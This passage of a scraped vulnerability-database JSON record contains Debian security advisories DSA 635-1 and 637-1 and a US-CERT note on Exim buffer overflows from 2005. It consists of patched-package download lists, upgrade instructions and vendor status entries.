78e5eecee7101a355ddabec9d0f07b98\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4_ia64.deb\n Size/MD5 checksum: 972852 43f4fc30483d8ad5c42e031fd64a9e8d\n http://security.debian.org/pool/updates/main/e/exim/eximon_3.35-1woody4_ia64.deb\n Size/MD5 checksum: 65166 cdc921d9be2ec60b5f0ed95a5b976732\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4_hppa.deb\n Size/MD5 checksum: 815358 c506baffb4404f32762468fbc494551c\n 
http://security.debian.org/pool/updates/main/e/exim/eximon_3.35-1woody4_hppa.deb\n Size/MD5 checksum: 48294 d90efe5be79e966e07a7cbe8e9013939\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4_m68k.deb\n Size/MD5 checksum: 737856 aefe6b63ebd03e9fe449afe22e752547\n http://security.debian.org/pool/updates/main/e/exim/eximon_3.35-1woody4_m68k.deb\n Size/MD5 checksum: 37752 e0d2b938e50c3b408928b8150459ad2b\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4_mips.deb\n Size/MD5 checksum: 824458 0c1db679287a6de37f2c320f335c650c\n http://security.debian.org/pool/updates/main/e/exim/eximon_3.35-1woody4_mips.deb\n Size/MD5 checksum: 48882 1670c36409482a8a870becf826f7ae68\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4_mipsel.deb\n Size/MD5 checksum: 824846 88564f1d1b0c1781587d5db1bccdde77\n http://security.debian.org/pool/updates/main/e/exim/eximon_3.35-1woody4_mipsel.deb\n Size/MD5 checksum: 48778 6a7002c766a84dd81eed39d23f8709d5\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4_powerpc.deb\n Size/MD5 checksum: 794244 abfa2009cd6417101d120a5980641012\n http://security.debian.org/pool/updates/main/e/exim/eximon_3.35-1woody4_powerpc.deb\n Size/MD5 checksum: 44794 ea626fcb485a423fb56e61a1c4ae67e9\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4_s390.deb\n Size/MD5 checksum: 780026 bc9a3b5488cd7ee72c290f86f601beec\n http://security.debian.org/pool/updates/main/e/exim/eximon_3.35-1woody4_s390.deb\n Size/MD5 checksum: 43930 f50688c682bcaeabfbd47c9e46a06143\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/e/exim/exim_3.35-1woody4_sparc.deb\n Size/MD5 checksum: 785298 1841407d21f544cf2645e373a6caad15\n 
http://security.debian.org/pool/updates/main/e/exim/eximon_3.35-1woody4_sparc.deb\n Size/MD5 checksum: 42444 632b5aadc5c930c7c3e956fef10d5ffe\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "modified": "2005-01-12T00:00:00", "published": "2005-01-12T00:00:00", "id": "DEBIAN:DSA-635-1:15035", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00013.html", "title": "[SECURITY] [DSA 635-1] New exim packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T22:14:27", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 637-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nJanuary 13th, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : exim-tls\nVulnerability : buffer overflow\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CAN-2005-0021\nDebian Bug : 289046\n\nPhilip Hazel announced a buffer overflow in the host_aton function in\nexim-tls, the SSL-enabled version of the default mail-tranport-agent\nin Debian, which can lead to the execution of arbitrary code via an\nillegal IPv6 address.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 3.35-3woody3.\n\nIn the unstable distribution (sid) this package does not exist\nanymore.\n\nWe recommend that you upgrade your exim-tls 
package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3.dsc\n Size/MD5 checksum: 677 059e83c496e959d01bcca0a11637b017\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3.diff.gz\n Size/MD5 checksum: 80492 90d594f60ae815a780faa5f9c9d1859d\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35.orig.tar.gz\n Size/MD5 checksum: 1271057 42d362e40a21bd7ffc298f92c8bd986a\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_alpha.deb\n Size/MD5 checksum: 873682 935e1dddb27a713d562b905c2951dea7\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_arm.deb\n Size/MD5 checksum: 784148 c97ded116303fe5ee1c4a9f741350c58\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_i386.deb\n Size/MD5 checksum: 759442 1477e25fe953ee209ec86a67a59306ba\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_ia64.deb\n Size/MD5 checksum: 974058 74cd3707971105a75398a0ce46e4bb80\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_hppa.deb\n Size/MD5 checksum: 814316 56d73dab6e0bbd4df6068c5f9f065491\n\n Motorola 680x0 architecture:\n\n 
http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_m68k.deb\n Size/MD5 checksum: 736730 ba35f1bd8dcfaf6ef9f35aded9176cab\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_mips.deb\n Size/MD5 checksum: 824408 0f8af4bf6f39d1dbb10e05e5717e3115\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_mipsel.deb\n Size/MD5 checksum: 825160 abfc0dc6c75fc7fafba89f6673bd1913\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_powerpc.deb\n Size/MD5 checksum: 792574 f8c3a2d72890f766a72a6ddc39f2ea31\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_s390.deb\n Size/MD5 checksum: 779236 aca9521a7b347d291e158a919cca0ed5\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_sparc.deb\n Size/MD5 checksum: 782800 5e3a9478dc77a0943ce0c41611973c95\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "modified": "2005-01-13T00:00:00", "published": "2005-01-13T00:00:00", "id": "DEBIAN:DSA-637-1:4973F", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00015.html", "title": "[SECURITY] [DSA 637-1] New exim-tls packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2018-12-25T20:19:41", 
"bulletinFamily": "info", "description": "### Overview \n\nThe Exim Mail Transfer Agent (MTA) contains a buffer overflow that allows a local attacker to execute arbitrary code.\n\n### Description \n\nExim MTA is an open-source mail transport agent distributed by the University of Cambridge. A lack of input validation on user supplied data may allow a buffer overflow to occur in Exim. If a local attacker supplies the Exim with a specially crafted command line options, that attacker may be able to cause a buffer overflow in the `dns_build_reverse()`routine.\n\nAccording to public reports, this vulnerability exists in Exim versions prior to 4.44. \n \n--- \n \n### Impact \n\nA local attacker may be able to execute arbitrary code with elevated (`root`) privileges. \n \n--- \n \n### Solution \n\n**Upgrade** \n \nThis issue has been addressed in [Exim version 4.4.](<http://www.exim.org/>) \n \n--- \n \n### Vendor Information\n\n132992\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. 
Click here to view vendors.**\n\n### __ Conectiva \n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ Debian \n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe Debian advisories for this vulnerability can be found at: \n\n \n<http://www.nl.debian.org/security/2005/dsa-635> \nand \n<http://www.debian.org/security/2005/dsa-637>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ Engarde \n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ Gentoo \n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not 
provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe Gentoo advisory for this vulnerability can be found at: \n\n \n<http://www.gentoo.org/security/en/glsa/glsa-200501-23.xml>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ Hewlett-Packard Company \n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ IBM \n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ Immunix \n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 
Feedback>).\n\n### __ Ingrian Networks \n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ MandrakeSoft \n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ MontaVista Software \n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ OpenBSD \n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional 
comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ Red Hat Inc. \n\nUpdated: January 28, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n### __ University of Cambridge \n\nUpdated: January 27, 2005 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23132992 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * [http://www.idefense.com/application/poi/display?id=183&type=vulnerabilit&flashstatus=false](<http://www.idefense.com/application/poi/display?id=183&type=vulnerabilit&flashstatus=false>)\n * <http://www.securitytracker.com/alerts/2005/Jan/1012904.html>\n * <http://secunia.com/advisories/13713/>\n * <http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html>\n\n### Credit\n\nThis vulnerability was reported by iDEFENSE Inc. \n\nThis document was written by Jeff Gennari. 
\n\n### Other Information\n\n**CVE IDs:** | [CVE-2005-0021](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0021>) \n---|--- \n**Severity Metric:** | 2.76 \n**Date Public:** | 2005-01-14 \n**Date First Published:** | 2005-01-27 \n**Date Last Updated:** | 2005-01-28 20:18 UTC \n**Document Revision:** | 69 \n", "modified": "2005-01-28T20:18:00", "published": "2005-01-27T00:00:00", "id": "VU:132992", "href": "https://www.kb.cert.org/vuls/id/132992", "type": "cert", "title": "Exim vulnerable to buffer overflow via the dns_build_reverse() routine", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}